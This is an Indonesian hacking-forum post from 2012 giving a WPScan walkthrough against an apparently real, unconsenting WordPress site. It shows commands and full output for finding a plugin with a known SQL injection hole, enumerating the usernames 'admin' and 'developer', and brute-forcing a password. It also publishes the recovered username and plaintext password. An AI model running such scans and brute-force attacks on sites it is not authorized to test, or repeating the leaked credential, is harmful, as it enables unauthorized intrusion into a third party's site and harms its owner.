Indonesian SWF Editor Community
 
HomeRegisterLog in
SELAMAT Datang Di Cmonhackns ===> Mulailah dari yang kecil... karena semua yang besar dulunya juga kecil..

Share | 
 

 Enumerate wordpress site dengan wpsan.rb

View previous topic View next topic Go down 
AuthorMessage
RieqyNS13
Moderator
Moderator
avatar

Jumlah posting : 379
Join date : 2011-01-16
Age : 19
Lokasi : chmod 0655 GetConfig.SQL

PostSubject: Enumerate wordpress site dengan wpsan.rb   Sun Dec 30, 2012 11:15 pm

Wpscan kanggo linux
gak usah kebanyakan bacot gan :dead
mungkin sebagian besar member DC udah tw,,jdi yg udah tw enyah aja dri sini,,ane cuma mw share untuk yg blum tw aja :dead

1. buka wpscan.rb ( /pentest/web/wpscan )
2. ketik wpscan.rb ,,trus enter. biasanya ditanya mw update atau kagak,,klo kagak ente ketik n klo mw update ketik y.
[*]klo agan milih y,trus udah selesai updatenya,,biasanyw muncul error kya gini pas buka wpscan.rb
Code:
root@bt:/pentest/web/wpscan# ./wpscan.rb -h
[ERROR] Install missing ruby gem. Please see README file or http://code.google.com/p/wpscan/
#<LoadError: no such file to load -- nokogiri>
solusinya udah ada di error messagenya gan -_- :
Code:
gem install --user-install nokogiri
Code:
root@bt:/pentest/web/wpscan# gem install --user-install nokogiri
WARNING:  You don't have /root/.gem/ruby/1.9.2/bin in your PATH,
      gem executables will not run.
Building native extensions.  This could take a while...
Successfully installed nokogiri-1.5.2
1 gem installed
Installing ri documentation for nokogiri-1.5.2...
Installing RDoc documentation for nokogiri-1.5.2...

3. Ketik ./wpscan.rb atau ./wpscan.rb --help
Code:
____________________________________________________
 __          _______  _____                 
 \ \        / /  __ \ / ____|               
  \ \  /\  / /| |__) | (___  ___  __ _ _ __ 
  \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |    ____) | (__| (_| | | | |
    \/  \/  |_|    |_____/ \___|\__,_|_| |_| v1.1r425

    WordPress Security Scanner by the WPScan Team
 Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan

Help :

Some values are settable in conf/browser.conf.json :
  user-agent, proxy, threads, cache timeout and request timeout

--update  Update to the latest revision
--url  | -u <target url>  The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)]  Enumeration.
  option :
    u        usernames from id 1 to 10
    u[10-20] usernames from id 10 to 20 (you must write [] chars)
    p        plugins
    p!      only vulnerable plugins
    t        timthumbs
  Multiple values are allowed : '-e tp' will enumerate timthumbs and plugins
  If no option is supplied, the default is 'tup!'

--follow-redirection  If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--wp-content-dir <wp content dir>  WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed
--wp-plugins-dir <wp plugins dir>  Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy  Supply a proxy in the format host:port (will override the one from conf/browser.conf.json)
--wordlist | -w <wordlist>  Supply a wordlist for the password bruter and do the brute.
--threads  | -t <number of threads>  The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)
--username | -U <username>  Only brute force the supplied username.
--help    | -h This help screen.
--verbose  | -v Verbose output.

. sampe sini agan bisa nerusin sendiri kan ? :ngamuk:nothing
Klo ada yg belum tw,,ya udah ane ksih tutor sekalian. bgi yg udah tw ngapain ente kemari :ngakak

4. Masukin url dan pilih option lainnya, misalkan ane mw liat2 pluginnya yg vuln :
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate p!
Code:
root@bt:/pentest/web/wpscan# ./wpscan.rb --url www.productbestbuy.com --enumerate p!
____________________________________________________
 __          _______  _____                 
 \ \        / /  __ \ / ____|               
  \ \  /\  / /| |__) | (___  ___  __ _ _ __ 
  \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |    ____) | (__| (_| | | | |
    \/  \/  |_|    |_____/ \___|\__,_|_| |_| v1.1r425

    WordPress Security Scanner by the WPScan Team
 Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan

| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 21:54:53 2012

[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator

[+] Enumerating plugins from passive detection ... 2 found :

 | Name: amazon-link
 | Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/

 | Name: jetpack
 | Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
 |
 | [!] jetpack plugin SQL Injection Vulnerability
 | * Reference: http://www.exploit-db.com/exploits/18126/

[+] Enumerating installed plugins (only vulnerable ones) ...

Checking for 253 total plugins... 100% complete.

[+] We found 1 plugins:

 | Name: jetpack
 | Location: http://www.productbestbuy.com/wp-content/plugins/jetpack/
 | Directory listing enabled? Yes.
 |
 | [!] jetpack plugin SQL Injection Vulnerability
 | * Reference: http://www.exploit-db.com/exploits/18126/

[+] Finished at Sun Dec 30 21:56:44 2012
tu gan, nemu 1 plugin vuln,,malah udah dikasih exploit nya :tepokjidat

5. skarang coba ane cari username nya :
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate u
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate u
____________________________________________________
 __          _______  _____                 
 \ \        / /  __ \ / ____|               
  \ \  /\  / /| |__) | (___  ___  __ _ _ __ 
  \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |    ____) | (__| (_| | | | |
    \/  \/  |_|    |_____/ \___|\__,_|_| |_| v1.1r425

    WordPress Security Scanner by the WPScan Team
 Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan

| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 22:22:31 2012

[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator

[+] Enumerating plugins from passive detection ... 2 found :

 | Name: amazon-link
 | Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/

 | Name: jetpack
 | Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
 |
 | [!] jetpack plugin SQL Injection Vulnerability
 | * Reference: http://www.exploit-db.com/exploits/18126/

[+] Enumerating usernames ...

We found the following 2 username/s :

  admin
  developer
ada 2 user gan, admin ama developer
wpscan versi bru aneh,,wong cuma nyari username aja,,pluginnya ikut discan juga :stress (buang2 waktu aja)

6. skarang nyari password nya pke brute force :kartumerah, harus sediain wordlist.lst bejibun nih berarti :prustasi. Wordist ane letaknya di /root/Desktop/wordlist.lst
Code:
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst
Code:
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst
____________________________________________________
 __          _______  _____                 
 \ \        / /  __ \ / ____|               
  \ \  /\  / /| |__) | (___  ___  __ _ _ __ 
  \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |    ____) | (__| (_| | | | |
    \/  \/  |_|    |_____/ \___|\__,_|_| |_| v1.1r425

    WordPress Security Scanner by the WPScan Team
 Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan

| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 22:36:41 2012

[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator

[+] Enumerating plugins from passive detection ...
2 found :

 | Name: amazon-link
 | Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/

 | Name: jetpack
 | Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
 |
 | [!] jetpack plugin SQL Injection Vulnerability
 | * Reference: http://www.exploit-db.com/exploits/18126/

[+] Starting the password brute forcer

  Brute forcing user 'developer' with 12 passwords... 58% complete.
  [SUCCESS] Username : developer Password : cisadane123456


[+] Finished at Sun Dec 30 22:38:18 2012
nemu tuh gan
Code:
Username : developer Password : cisadane123456
pic:
pic:
 

penulis : RieqyNS13
wpscan developer : ethicalhacke3r

kata developernya,,wpscan.rb gak support untuk windows walapun udah di install ruby(pengalaman),,jdi coba aga pke cygwin aja :ngakak
agar lebih tw,,agan2 liat README nya aja -_-
Code:
https://github.com/wpscanteam/wpscan/blob/master/README

_________________
403 Forbidden
Back to top Go down
http://rieqyns13.net
 
Enumerate wordpress site dengan wpsan.rb
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» Anyone know a good overseas site to buy cd's from?
» Revamping Site!
» New Gfx Site
» zombie dating site
» The site could be temporarily unavailable or too busy

Permissions in this forum:You cannot reply to topics in this forum
cmonhackns.n-stars.org :: Computer Freakz :: All About Software-
Jump to: